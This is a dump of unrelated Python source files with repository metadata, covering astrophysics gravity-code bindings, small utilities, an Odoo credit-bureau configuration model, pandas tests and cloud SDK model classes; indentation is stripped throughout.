.. [#] J\"anes, J\"urgen; Pelupessy, Federico I.; Portegies Zwart, Simon, A&A, Volume 570, October 2014 (for CC, OK methods)
"""
include_headers = ['worker_code.h']
__so_module__ = 'huayno_cython'
MODE_OPENCL='opencl'
MODE_OPENMP='openmp'
def name_of_worker(self,mode):
if mode==self.MODE_OPENCL:
return 'huayno_worker_cl'
if mode==self.MODE_OPENMP:
return 'huayno_worker_mp'
return 'huayno_worker'
def __init__(self, mode=None, **options):
CodeInterface.__init__(self, name_of_the_worker = self.name_of_worker(mode), **options)
LiteratureReferencesMixIn.__init__(self)
@legacy_function
def get_time():
function = LegacyFunctionSpecification()
function.addParameter('time', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def commit_particles():
function = LegacyFunctionSpecification()
function.result_type = 'i'
return function
@legacy_function
def get_kinetic_energy():
function = LegacyFunctionSpecification()
function.addParameter('kinetic_energy', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def get_potential_energy():
function = LegacyFunctionSpecification()
function.addParameter('potential_energy', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def initialize_code():
function = LegacyFunctionSpecification()
function.result_type = 'i'
return function
@legacy_function
def evolve_model():
function = LegacyFunctionSpecification()
function.addParameter('time_end', dtype='d', direction=function.IN)
function.result_type = 'i'
return function
@legacy_function
def get_timestep_parameter():
function = LegacyFunctionSpecification()
function.addParameter('time_param', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def set_timestep_parameter():
function = LegacyFunctionSpecification()
function.addParameter('time_param', dtype='d', direction=function.IN)
function.result_type = 'i'
return function
@legacy_function
def get_timestep():
function = LegacyFunctionSpecification()
function.addParameter('timestep', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def set_timestep():
function = LegacyFunctionSpecification()
function.addParameter('timestep', dtype='d', direction=function.IN)
function.result_type = 'i'
return function
@legacy_function
def get_verbosity_parameter():
function = LegacyFunctionSpecification()
function.addParameter('verbosity', dtype='i', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def set_verbosity_parameter():
function = LegacyFunctionSpecification()
function.addParameter('verbosity', dtype='i', direction=function.IN)
function.result_type = 'i'
return function
@legacy_function
def get_number_of_particles():
function = LegacyFunctionSpecification()
function.addParameter('number_of_particles', dtype='i', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def get_inttype_parameter():
function = LegacyFunctionSpecification()
function.addParameter('inttype', dtype='i', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def set_inttype_parameter():
function = LegacyFunctionSpecification()
function.addParameter('inttype', dtype='i', direction=function.IN)
function.result_type = 'i'
return function
@legacy_function
def get_eps2_parameter():
function = LegacyFunctionSpecification()
function.addParameter('eps2', dtype='d', direction=function.OUT)
function.result_type = 'i'
return function
@legacy_function
def set_eps2_parameter():
function = LegacyFunctionSpecification()
function.addParameter('eps2', dtype='d', direction=function.IN)
function.result_type = 'i'
return function
def set_eps2(self, e):
return self.set_eps2_parameter(e)
def get_eps2(self):
return self.get_eps2_parameter()
@legacy_function
def get_evolve_statistics():
function = LegacyFunctionSpecification()
function.addParameter('ttot', dtype='int64', direction=function.OUT)
function.addParameter('ktot', dtype='int64', direction=function.OUT)
function.addParameter('dtot', dtype='int64', direction=function.OUT)
function.addParameter('tstot', dtype='int64', direction=function.OUT)
function.addParameter('kstot', dtype='int64', direction=function.OUT)
function.addParameter('dstot', dtype='int64', direction=function.OUT)
function.result_type = 'i'
return function
class Huayno(GravitationalDynamics,GravityFieldCode):
__interface__ = HuaynoInterface
class inttypes(object):
# http://stackoverflow.com/questions/36932/whats-the-best-way-to-implement-an-enum-in-python
SHARED2=1
EXTRAPOLATE=5
PASS_KDK=2
PASS_DKD=7
HOLD_KDK=3
HOLD_DKD=8
PPASS_DKD=9
BRIDGE_KDK=4
BRIDGE_DKD=10
CC=11
CC_KEPLER=12
OK=13
KEPLER=14
SHARED4=15
SHARED6=18
SHARED8=19
SHARED10=20
SHAREDBS=21
CCC=22
CCC_KEPLER=23
CC_BS=24
CCC_BS=25
BS_CC_KEPLER=26
CC_BSA=27
CCC_BSA=28
SHARED2_COLLISIONS=29
SHARED4_COLLISIONS=30
SHARED6_COLLISIONS=31
SHARED8_COLLISIONS=32
SHARED10_COLLISIONS=33
@classmethod
def _list(cls):
return set([x for x in list(cls.__dict__.keys()) if not x.startswith('_')])
def __init__(self, convert_nbody = None, **options):
self.stopping_conditions = StoppingConditions(self)
legacy_interface = self.__interface__(**options)
# self.legacy_doc = legacy_interface.__doc__
GravitationalDynamics.__init__(
self,
legacy_interface,
convert_nbody,
**options
)
def define_parameters(self, handler):
self.stopping_conditions.define_parameters(handler)
handler.add_method_parameter(
"get_eps2",
"set_eps2",
"epsilon_squared",
"smoothing parameter for gravity calculations",
default_value = 0.0 | nbody_system.length * nbody_system.length
)
handler.add_method_parameter(
"get_timestep_parameter",
"set_timestep_parameter",
"timestep_parameter",
"timestep parameter for gravity calculations",
default_value = 0.03
)
handler.add_method_parameter(
"get_timestep",
"set_timestep",
"timestep",
"timestep for evolve calls",
default_value = 0.0 | nbody_system.time
)
handler.add_method_parameter(
"get_verbosity_parameter",
"set_verbosity_parameter",
"verbosity_parameter",
"verbosity parameter (0 mean silent)",
default_value = 0
)
handler.add_method_parameter(
"get_inttype_parameter",
"set_inttype_parameter",
"inttype_parameter",
"integrator method to use",
default_value = 8
)
handler.add_method_parameter(
"get_begin_time",
"set_begin_time",
"begin_time",
"model time to start the simulation at",
default_value = 0.0 | nbody_system.time
)
def define_methods(self, handler):
GravitationalDynamics.define_methods(self, handler)
handler.add_method(
"get_eps2",
(),
(nbody_system.length * nbody_system.length, handler.ERROR_CODE,)
)
handler.add_method(
"set_eps2",
(nbody_system.length * nbody_system.length, ),
(handler.ERROR_CODE,)
)
handler.add_method(
"get_timestep_parameter",
(),
(handler.NO_UNIT, handler.ERROR_CODE,)
)
handler.add_method(
"set_timestep_parameter",
(handler.NO_UNIT, ),
(handler.ERROR_CODE,)
)
handler.add_method(
"get_timestep",
(),
(nbody_system.time, handler.ERROR_CODE,)
)
handler.add_method(
"set_timestep",
(nbody_system.time, ),
(handler.ERROR_CODE,)
)
handler.add_method(
"get_inttype_parameter",
(),
(handler.NO_UNIT, handler.ERROR_CODE,)
)
handler.add_method(
"set_inttype_parameter",
(handler.NO_UNIT, ),
(handler.ERROR_CODE,)
)
self.stopping_conditions.define_methods(handler)
def define_particle_sets(self, handler):
GravitationalDynamics.define_particle_sets(self, handler)
self.stopping_conditions.define_particle_set(handler)
def define_state(self, handler):
GravitationalDynamics.define_state(self, handler)
handler.add_method('RUN', 'get_kinetic_energy')
handler.add_method('RUN', 'get_potential_energy')
self.stopping_conditions.define_state(handler)
| [
"[email protected]"
]
| |
df42fb81ab121a9776879d10e34a82753afc05d5 | 8cf5d738aa1bf604c1215bff0e57aef0218a5194 | /0x1F-pascal_triangle/0-pascal_triangle.py | 570ddb16f491d2e0ae1e2b7f26f319cb0f7f6d38 | []
| no_license | PilarPinto/holbertonschool-interview | 3493bdb41fbc437e4dcf58db99cebcc350c2029f | b58bbce825426e9a15fee67dec65768f0ae0d724 | refs/heads/master | 2023-07-13T09:28:56.071905 | 2021-08-27T03:29:44 | 2021-08-27T03:29:44 | 281,306,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 472 | py | #!/usr/bin/python3
'''
Module where the integers representing the Pascal’s triangle
'''
def pascal_triangle(n):
'''Pascal priniting functions'''
if n <= 0:
return []
pas_r = [[1]]
if n > 1:
pas_r.append([1, 1])
for ind in range(3, n + 1):
pas_r.append([1] + list(map(
lambda i: pas_r[ind - 2][i] + pas_r[ind - 2][i + 1], range(
len(pas_r[ind - 2]) - 1))) + [1])
return pas_r
| [
"[email protected]"
]
| |
1b4daeedaade35bbdf704edc9591e83126e98f90 | 3805c40a5f037cb6439798f4ffc6babc5cddc004 | /dogpile/__init__.py | 345ce1cbe636b5f78423505e2638f10c3e99b39a | [
"BSD-2-Clause",
"LicenseRef-scancode-warranty-disclaimer"
]
| permissive | thestick613/dogpile.cache | ba1df3a8e71b7f22cc4b3bc52f32a7d90555b125 | a0939e132dc0964a315137787903a561f5fa5f06 | refs/heads/master | 2022-07-15T13:34:37.923493 | 2022-06-23T08:02:02 | 2022-06-23T08:02:02 | 205,935,922 | 0 | 0 | NOASSERTION | 2022-06-23T08:02:03 | 2019-09-02T21:00:39 | Python | UTF-8 | Python | false | false | 106 | py | __version__ = "0.7.2"
from .lock import Lock # noqa
from .lock import NeedRegenerationException # noqa
| [
"[email protected]"
]
| |
f10521bec9c35ed9de1f626cde80d9f4c3eccfd2 | 3b5c46ce2daa75e1e157838d0f6cfd92469471a0 | /plastering/inferencers/scrabble/ground_truth_gen.py | 06262e23e98f035aa786f957245812f56a341b1c | [
"MIT"
]
| permissive | plastering/plastering | 1b4e9c04fce4b26b22fe5ade05af9baf644b4eaa | 26ffeecb38844ebb122fde5d9bd2276a7b4150a0 | refs/heads/master | 2023-04-04T07:50:59.087529 | 2021-05-17T23:31:40 | 2021-05-17T23:31:40 | 149,086,461 | 37 | 17 | MIT | 2023-03-24T23:19:24 | 2018-09-17T07:32:17 | Python | UTF-8 | Python | false | false | 3,069 | py | import pdb
import json
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(choices=['ap_m','ebu3b', 'bml'], dest='building')
args = parser.parse_args()
import pandas as pd
from brick_parser import equipTagsetList as equip_tagsets, \
locationTagsetList as location_tagsets,\
pointSubclassDict as point_subclass_dict,\
equipSubclassDict as equip_subclass_dict,\
locationSubclassDict as location_subclass_dict
subclass_dict = dict()
subclass_dict.update(point_subclass_dict)
subclass_dict.update(equip_subclass_dict)
subclass_dict.update(location_subclass_dict)
subclass_dict['networkadapter'] = list()
subclass_dict['none'] = list()
subclass_dict['unknown'] = list()
building = args.building
sensor_df = pd.read_csv('metadata/{0}_sensor_types_location.csv'\
.format(building)).set_index('Unique Identifier')
with open('metadata/{0}_label_dict_justseparate.json'\
.format(building), 'r') as fp:
label_dict = json.load(fp)
with open('metadata/{0}_sentence_dict_justseparate.json'\
.format(building), 'r') as fp:
sentence_dict = json.load(fp)
nonpoint_tagsets = equip_tagsets + location_tagsets + ['networkadapter']
def find_nonpoint_tagsets(tagset):
if tagset.split('-')[0] in nonpoint_tagsets:
return tagset
else:
return ''
truth_dict = dict()
for srcid, label_list in label_dict.items():
sentence = sentence_dict[srcid]
phrase_list = list()
truth_list = list()
sentence_meanings = [(token,label)
for token, label
in zip(sentence, label_list)
if label not in ['none', 'unknown']]
right_identifier_buffer = ''
for (token, label) in sentence_meanings:
if label=='leftidentifier':
# phrase_list[-1] += ('-' + token)
continue
elif label=='rightidentifier':
# right_identifier_buffer += token
continue
phrase_list.append(label)
if right_identifier_buffer:
phrase_list[-1] += ('-' + right_identifier_buffer)
truth_list = [phrase
for phrase
in phrase_list
if find_nonpoint_tagsets(phrase)]
removing_tagsets = list()
for tagset in truth_list:
subclasses = subclass_dict[tagset.split('-')[0]]
if sum([True if tagset in subclasses else False
for tagset in truth_list]) > 1:
removing_tagsets.append(tagset)
for tagset in removing_tagsets:
truth_list = list(filter(tagset.__ne__, truth_list))
try:
truth_list.append(sensor_df['Schema Label'][srcid].replace(' ', '_'))
except:
print(srcid, 'failed')
truth_dict[srcid] = list(set(truth_list))
# TODO: add all labels to a dict (except point type info)
with open('metadata/{0}_ground_truth.json'.format(building), 'w') as fp:
json.dump(truth_dict, fp, indent=2)
| [
"[email protected]"
]
| |
12e23d45d86604712c62c27d9d5d24bbd21d6e2f | c325866c577343752f0d4394c3d96e599674df0e | /models/nosis_configuracion.py | b133bf8a84cf2a4d4f2ff5dd7f1a714f0cc0ee4e | []
| no_license | levislibra/financiera_nosis | ff11f4f8417917d48220d40c1524f91d5f1a4d24 | 3227e9258e2f8519880081232070734e929af3f8 | refs/heads/master | 2023-01-05T20:23:01.509995 | 2022-12-22T18:33:05 | 2022-12-22T18:33:05 | 236,527,122 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,340 | py | # -*- coding: utf-8 -*-
from openerp import models, fields, api
from datetime import datetime, timedelta
from dateutil import relativedelta
from openerp.exceptions import UserError, ValidationError
import time
import requests
ENDPOINT_NOSIS = 'https://ws01.nosis.com/rest/variables'
class FinancieraNosisConfiguracion(models.Model):
_name = 'financiera.nosis.configuracion'
name = fields.Char('Nombre')
usuario = fields.Char('Usuario')
token = fields.Char('Token')
id_informe = fields.Integer('Id proximo informe', default=1)
id_cuestionario = fields.Integer('Id proximo cuestionario', default=1)
ejecutar_cda_al_solicitar_informe = fields.Boolean('Ejecutar CDAs al solicitar informe')
solicitar_informe_enviar_a_revision = fields.Boolean('Solicitar informe al enviar a revision')
vr = fields.Integer('Grupo de variables')
nro_grupo_vid = fields.Integer('Grupo VID')
nro_grupo_vid2 = fields.Integer('Grupo VID 2do intento')
nosis_variable_1 = fields.Char('Variable 1')
nosis_variable_2 = fields.Char('Variable 2')
nosis_variable_3 = fields.Char('Variable 3')
nosis_variable_4 = fields.Char('Variable 4')
nosis_variable_5 = fields.Char('Variable 5')
asignar_nombre_cliente = fields.Boolean('Asignar Nombre al cliente')
asignar_nombre_cliente_variable = fields.Char('Variable para el Nombre', default='VI_RazonSocial')
asignar_direccion_cliente = fields.Boolean('Asignar Direccion al cliente')
asignar_calle_cliente_variable = fields.Char('Variable para la calle', default='VI_DomAF_Calle')
asignar_nro_cliente_variable = fields.Char('Variable para el Nro', default='VI_DomAF_Nro')
asignar_piso_cliente_variable = fields.Char('Variable para el Piso', default='VI_DomAF_Piso')
asignar_departamento_cliente_variable = fields.Char('Variable para el Departamento', default='VI_DomAF_Dto')
asignar_ciudad_cliente = fields.Boolean('Asignar Ciudad a direccion')
asignar_ciudad_cliente_variable = fields.Char('Variable para la ciudad', default='VI_DomAF_Loc')
asignar_cp_cliente = fields.Boolean('Asignar CP a direccion')
asignar_cp_cliente_variable = fields.Char('Variable para el CP', default='VI_DomAF_CP')
asignar_provincia_cliente = fields.Boolean('Asignar Provincia a direccion')
asignar_provincia_cliente_variable = fields.Char('Variable para la Provincia', default='VI_DomAF_Prov')
asignar_identificacion_cliente = fields.Boolean('Asignar identificacion al cliente')
asignar_identificacion_cliente_variable = fields.Char('Variable para la identificacion', default='VI_Identificacion')
asignar_genero_cliente = fields.Boolean('Asignar genero al cliente')
asignar_genero_cliente_variable = fields.Char('Variable para genero', default='VI_Sexo')
company_id = fields.Many2one('res.company', 'Empresa', required=False, default=lambda self: self.env['res.company']._company_default_get('financiera.nosis.configuracion'))
@api.one
def test_conexion(self):
params = {
'usuario': self.usuario,
'token': self.token,
}
response = requests.get(ENDPOINT_NOSIS, params)
if response.status_code == 400:
raise UserError("La cuenta esta conectada.")
else:
raise UserError("Error de conexion.")
class ExtendsResCompany(models.Model):
_name = 'res.company'
_inherit = 'res.company'
nosis_configuracion_id = fields.Many2one('financiera.nosis.configuracion', 'Configuracion Nosis')
| [
"[email protected]"
]
| |
563eba447c671fd512d395f592dacda7801a7acf | 1b9075ffea7d4b846d42981b41be44238c371202 | /2008/devel/applications/office/abiword/actions.py | e75fb6419d91ba18ae0f32bc78933b9d14e7ebfc | []
| no_license | pars-linux/contrib | bf630d4be77f4e484b8c6c8b0698a5b34b3371f4 | 908210110796ef9461a1f9b080b6171fa022e56a | refs/heads/master | 2020-05-26T20:35:58.697670 | 2011-07-11T11:16:38 | 2011-07-11T11:16:38 | 82,484,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 848 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2
# See the file http://www.gnu.org/copyleft/gpl.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
def setup():
autotools.configure("--with-x \
--with-ImageMagick \
--with-libxml2 \
--with-zlib \
--with-libpng \
--with-popt \
--enable-printing \
--enable-gnomeui")
def build():
autotools.make()
def install():
autotools.rawInstall("DESTDIR=%s" % get.installDIR())
pisitools.dodoc("docs/Abi*", "docs/NonLatin1UnixLocales.abw")
| [
"MeW@a748b760-f2fe-475f-8849-a8a11d7a3cd2"
]
| MeW@a748b760-f2fe-475f-8849-a8a11d7a3cd2 |
c805b342485e670743486773449b5dfe5ee5d797 | 5c269629ca7d5ffb3a6035d056ae88f90fd8153a | /pandas/tests/series/test_dtypes.py | 6864eac603ded8a41a02dd6bd6d298bf10d41607 | [
"BSD-3-Clause",
"LicenseRef-scancode-other-permissive",
"BSD-2-Clause"
]
| permissive | bdrosen96/pandas | 416e5cb1941b21cee38a30346056a257b7d2b0ce | 506520bd35331aa82db50686c07d96594cac0c10 | refs/heads/master | 2021-01-15T09:20:22.851970 | 2016-07-19T02:06:18 | 2016-07-19T02:06:23 | 63,601,381 | 0 | 0 | NOASSERTION | 2019-11-21T13:08:56 | 2016-07-18T12:31:49 | Python | UTF-8 | Python | false | false | 5,127 | py | # coding=utf-8
# pylint: disable-msg=E1101,W0612
import sys
from datetime import datetime
import string
from numpy import nan
import numpy as np
from pandas import Series
from pandas.tseries.index import Timestamp
from pandas.tseries.tdi import Timedelta
from pandas.compat import lrange, range, u
from pandas import compat
from pandas.util.testing import assert_series_equal
import pandas.util.testing as tm
from .common import TestData
class TestSeriesDtypes(TestData, tm.TestCase):
_multiprocess_can_split_ = True
def test_astype(self):
s = Series(np.random.randn(5), name='foo')
for dtype in ['float32', 'float64', 'int64', 'int32']:
astyped = s.astype(dtype)
self.assertEqual(astyped.dtype, dtype)
self.assertEqual(astyped.name, s.name)
def test_dtype(self):
self.assertEqual(self.ts.dtype, np.dtype('float64'))
self.assertEqual(self.ts.dtypes, np.dtype('float64'))
self.assertEqual(self.ts.ftype, 'float64:dense')
self.assertEqual(self.ts.ftypes, 'float64:dense')
assert_series_equal(self.ts.get_dtype_counts(), Series(1, ['float64']))
assert_series_equal(self.ts.get_ftype_counts(), Series(
1, ['float64:dense']))
def test_astype_cast_nan_int(self):
df = Series([1.0, 2.0, 3.0, np.nan])
self.assertRaises(ValueError, df.astype, np.int64)
def test_astype_cast_object_int(self):
arr = Series(["car", "house", "tree", "1"])
self.assertRaises(ValueError, arr.astype, int)
self.assertRaises(ValueError, arr.astype, np.int64)
self.assertRaises(ValueError, arr.astype, np.int8)
arr = Series(['1', '2', '3', '4'], dtype=object)
result = arr.astype(int)
self.assert_series_equal(result, Series(np.arange(1, 5)))
def test_astype_datetimes(self):
import pandas.tslib as tslib
s = Series(tslib.iNaT, dtype='M8[ns]', index=lrange(5))
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
s = Series([datetime(2001, 1, 2, 0, 0)])
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
s = Series([datetime(2001, 1, 2, 0, 0) for i in range(3)])
s[1] = np.nan
self.assertEqual(s.dtype, 'M8[ns]')
s = s.astype('O')
self.assertEqual(s.dtype, np.object_)
def test_astype_str(self):
# GH4405
digits = string.digits
s1 = Series([digits * 10, tm.rands(63), tm.rands(64), tm.rands(1000)])
s2 = Series([digits * 10, tm.rands(63), tm.rands(64), nan, 1.0])
types = (compat.text_type, np.str_)
for typ in types:
for s in (s1, s2):
res = s.astype(typ)
expec = s.map(compat.text_type)
assert_series_equal(res, expec)
# GH9757
# Test str and unicode on python 2.x and just str on python 3.x
for tt in set([str, compat.text_type]):
ts = Series([Timestamp('2010-01-04 00:00:00')])
s = ts.astype(tt)
expected = Series([tt('2010-01-04')])
assert_series_equal(s, expected)
ts = Series([Timestamp('2010-01-04 00:00:00', tz='US/Eastern')])
s = ts.astype(tt)
expected = Series([tt('2010-01-04 00:00:00-05:00')])
assert_series_equal(s, expected)
td = Series([Timedelta(1, unit='d')])
s = td.astype(tt)
expected = Series([tt('1 days 00:00:00.000000000')])
assert_series_equal(s, expected)
def test_astype_unicode(self):
# GH7758
# a bit of magic is required to set default encoding encoding to utf-8
digits = string.digits
test_series = [
Series([digits * 10, tm.rands(63), tm.rands(64), tm.rands(1000)]),
Series([u('データーサイエンス、お前はもう死んでいる')]),
]
former_encoding = None
if not compat.PY3:
# in python we can force the default encoding for this test
former_encoding = sys.getdefaultencoding()
reload(sys) # noqa
sys.setdefaultencoding("utf-8")
if sys.getdefaultencoding() == "utf-8":
test_series.append(Series([u('野菜食べないとやばい')
.encode("utf-8")]))
for s in test_series:
res = s.astype("unicode")
expec = s.map(compat.text_type)
assert_series_equal(res, expec)
# restore the former encoding
if former_encoding is not None and former_encoding != "utf-8":
reload(sys) # noqa
sys.setdefaultencoding(former_encoding)
def test_complexx(self):
# GH4819
# complex access for ndarray compat
a = np.arange(5, dtype=np.float64)
b = Series(a + 4j * a)
tm.assert_numpy_array_equal(a, b.real)
tm.assert_numpy_array_equal(4 * a, b.imag)
b.real = np.arange(5) + 5
tm.assert_numpy_array_equal(a + 5, b.real)
tm.assert_numpy_array_equal(4 * a, b.imag)
| [
"[email protected]"
]
| |
f982f49bded21d3ec480ed23147785cb1e622b6f | e4007870b4d75ba23c2f12ac6646f272cf17865c | /Types/Detection_3D.py | 33c52d337085600db6cc52e4e9c38d9631902223 | [
"MIT"
]
| permissive | knut0815/PythonUtility | 385ce332ff34501be7ad21ac7948eb609770e72a | 0062e1e60dc151776b963d13bc4c1763eb90d333 | refs/heads/master | 2023-01-10T09:58:14.619531 | 2020-11-10T12:22:47 | 2020-11-10T12:22:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,453 | py | import numpy as np
from Utility.Classes.Frozen_Class import FrozenClass
class Detection3D(FrozenClass):
def __init__(self, frame, track_id, detection_type, truncation, occlusion, obs_angle, bbox, dimensions, location, rotation_y, score):
self.frame = frame
self.track_id = track_id
# detection_type: 'Car', 'Van', 'Truck', 'Pedestrian', 'Person_sitting', 'Cyclist', 'Tram', 'Misc' or 'DontCare'
self.detection_type = detection_type
# truncated: Float from 0 (non-truncated) to 1 (truncated)
self.truncation = truncation
# occluded: integer (0,1,2,3) indicating occlusion state:
# 0 = fully visible, 1 = partly occluded, 2 = largely occluded, 3 = unknown
self.occlusion = occlusion
# bservation angle of object, ranging [-pi..pi]
self.obs_angle = obs_angle
# 2D bounding box of object in the image (0-based index): contains left, top, right, bottom pixel coordinates
self.bbox = bbox
# 3D object dimensions: height, width, length (in meters)
self.dimensions = dimensions
# 3D object location x,y,z in camera coordinates (in meters)
self.location = location
# Rotation ry around Y-axis in camera coordinates [-pi..pi]
self.rotation_y = rotation_y
self.score = score
@classmethod
def from_string_list(cls, string_list):
return cls(
frame=int(float(string_list[0])), # frame
track_id=int(float(string_list[1])), # id
detection_type=string_list[2].lower(), # object type [car, pedestrian, cyclist, ...]
truncation=float(string_list[3]), # truncation [0..1]
occlusion=int(float(string_list[4])), # occlusion [0,1,2]
obs_angle=float(string_list[5]), # observation angle [rad]
bbox=np.array([float(string_list[6]), float(string_list[7]), float(string_list[8]), float(string_list[9])], dtype=float), # left [px], top [px], right [px], bottom [px]
dimensions=np.array([float(string_list[10]), float(string_list[11]), float(string_list[12])], dtype=float), # height [m], width [m], length [m]
location=np.array([float(string_list[13]), float(string_list[14]), float(string_list[15])], dtype=float), # X [m]
rotation_y=float(string_list[16]), # yaw angle [rad]
score=float(string_list[17]) if len(string_list) >= 18 else None
)
| [
"[email protected]"
]
| |
b649bb21ea563e3765210bd62d99d5b730a5b950 | 8fb2668de046fb47ffb3e0964746b400e75b7c83 | /crawl/fake_spider/tushare/kData.py | 79515c39159d08946ce04bb198cc6e7d8deaf6af | []
| no_license | reinhardtken/backtest-py | 5d8f080861851882d954f4bb944a8d374220498e | 6d14b10918c018081ab228030d2b3ac38eea267c | refs/heads/master | 2020-12-06T17:01:33.284011 | 2020-02-11T15:07:42 | 2020-02-11T15:07:42 | 232,512,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,473 | py | # -*- encoding: utf-8 -*-
# sys
import json
import datetime
# thirdpart
import pandas as pd
import tushare as ts
from pymongo import MongoClient
# this project
##########################
import util.crawl as util
import const.crawl as const
#http://tushare.org/classifying.html#id8
# code :股票代码
# name :股票名称
# date :日期
# weight:权重
def getLastK(code):
end = util.today().strftime('%Y-%m-%d')
start = util.weekAgo().strftime('%Y-%m-%d')
try:
df = ts.get_k_data(code, start=start, end=end)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKData(code, starts='2001-01-01'):
try:
df = ts.get_k_data(code, start=starts, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataRecent(code):
try:
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
starts = starts.strftime('%Y-%m-%d')
df = ts.get_k_data(code, start=starts, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataNoneRecent(code):
try:
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
starts = starts.strftime('%Y-%m-%d')
df = ts.get_k_data(code, start=starts, autype=None, index=False)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def getKDataNone(code, starts='2001-01-01', index=False):
try:
df = ts.get_k_data(code, start=starts, autype=None, index=index)
df.loc[:, 'date'] = pd.to_datetime(df.loc[:, 'date'])
df.set_index('date', inplace=True)
df.drop('code', axis=1, inplace=True)
return df
except Exception as e:
print(e)
def saveDB(data: pd.DataFrame, code, handler=None):
def callback(result):
# handler.send_message(handler.project_name, result, self._date + '_' + result['_id'])
pass
re = util.updateMongoDB(data, util.genKeyCodeFunc('date'), const.KData.DB_NAME,
const.KData.COLLECTION_D_HEAD + code, True, callback)
# util.everydayChange(re, 'gpfh')
#这个是前复权
def RunOne(code, force=False):
#dblist = MongoClient.list_database_names()
client = MongoClient()
db = client['stock_all_kdata']
collectionLIst = db.list_collection_names()
if not force and code in collectionLIst:
print("exist {}".format(code))
else:
#如果强制更新,删除已有数据
if force and code in collectionLIst:
db.drop_collection(code)
re = getKData(code)
saveDB2(re, code)
def saveDB2(data: pd.DataFrame, code, handler=None):
def callback(result):
pass
util.updateMongoDB(data, util.genKeyCodeFunc('date'), "stock_all_kdata",
const.KData.COLLECTION_D_HEAD + code, True, callback)
#这个是不复权
def RunOneNone(code):
client = MongoClient()
db = client['stock_all_kdata_none']
collectionList = db.list_collection_names()
if code in collectionList:
print("exist {}".format(code))
else:
re = getKDataNone(code)
saveDB3(re, code)
#最近一个月的数据
def RunOneNoneRecent(code):
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=31)
#starts = datetime.datetime(now.year, now.month, 1)
starts = starts.strftime('%Y-%m-%d')
re = getKDataNone(code, starts)
saveDB3(re, code)
def RunHS300IndexRecent():
now = datetime.datetime.now()
starts = now - datetime.timedelta(days=15)
# starts = datetime.datetime(now.year, now.month, 1)
starts = starts.strftime('%Y-%m-%d')
re = getKDataNone('000300', starts, index=True)
saveDB3(re, '000300')
def RunHS300Index():
re = getKDataNone('000300', starts='2001-01-01', index=True)
saveDB3(re, '000300')
def saveDB3(data: pd.DataFrame, code, handler=None):
def callback(result):
pass
util.updateMongoDB(data, util.genKeyCodeFunc('date'), "stock_all_kdata_none",
const.KData.COLLECTION_D_HEAD + code, True,
callback)
| [
"[email protected]"
]
| |
d6b66c5898c3f0ff071147ca16a962d71c7d3fe2 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-cae/huaweicloudsdkcae/v1/model/component_snapshot_context.py | 4520d2f8150fd8c09f48b38ca2704f273519d7c8 | [
"Apache-2.0"
]
| permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 20,094 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class ComponentSnapshotContext:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'app_id': 'str',
'available_replica': 'int',
'build': 'str',
'build_id': 'str',
'build_log_id': 'str',
'env_id': 'str',
'id': 'str',
'image_url': 'str',
'job_id': 'str',
'log_group_id': 'str',
'log_stream_id': 'str',
'name': 'str',
'operation': 'str',
'operation_status': 'str',
'replica': 'int',
'resource_limit': 'str',
'runtime': 'str',
'source': 'str',
'status': 'str',
'version': 'str',
'created_at': 'str',
'updated_at': 'str'
}
attribute_map = {
'app_id': 'app_id',
'available_replica': 'available_replica',
'build': 'build',
'build_id': 'build_id',
'build_log_id': 'build_log_id',
'env_id': 'env_id',
'id': 'id',
'image_url': 'image_url',
'job_id': 'job_id',
'log_group_id': 'log_group_id',
'log_stream_id': 'log_stream_id',
'name': 'name',
'operation': 'operation',
'operation_status': 'operation_status',
'replica': 'replica',
'resource_limit': 'resource_limit',
'runtime': 'runtime',
'source': 'source',
'status': 'status',
'version': 'version',
'created_at': 'created_at',
'updated_at': 'updated_at'
}
